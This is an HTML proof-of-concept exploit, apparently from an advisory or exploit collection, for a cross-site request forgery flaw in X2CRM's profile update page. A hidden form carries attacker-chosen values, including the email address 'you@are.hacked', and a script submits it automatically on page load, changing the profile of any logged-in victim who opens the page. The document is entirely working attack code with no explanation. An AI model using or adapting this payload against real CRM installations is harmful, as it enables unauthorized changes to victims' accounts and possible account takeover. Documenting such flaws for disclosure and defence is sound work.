<form id="profile-form" action="http://x2crm.com/index.php/profile/update/1" method="post">
<input size="50" maxlength="250" name="Profile[tagLine]" id="Profile_tagLine" type="text" value="CSRF Profile page">
<input size="20" maxlength="20" name="Profile[officePhone]" id="Profile_officePhone" type="text" value="666-666-6666">
<input size="20" maxlength="20" name="Profile[cellPhone]" id="Profile_cellPhone" type="text" value="333-333-3333">
<input size="40" maxlength="40" name="Profile[emailAddress]" id="Profile_emailAddress" type="text" value="you@are.hacked">                   </div>
<input name="Profile[emailUseSignature]" id="Profile_emailUseSignature" value="None">
<input size="40" maxlength="250" name="Profile[googleId]" id="Profile_googleId" type="text" value="Hoha">
<textarea id="email-signature" name="Profile[emailSignature]"></textarea>
<textarea rows="6" cols="50" name="Profile[notes]" id="Profile_notes"></textarea>
<textarea rows="6" cols="50" name="Profile[address]" id="Profile_address"></textarea>
</form>
<script type="text/javascript">
document.getElementById('profile-form').submit();
</script>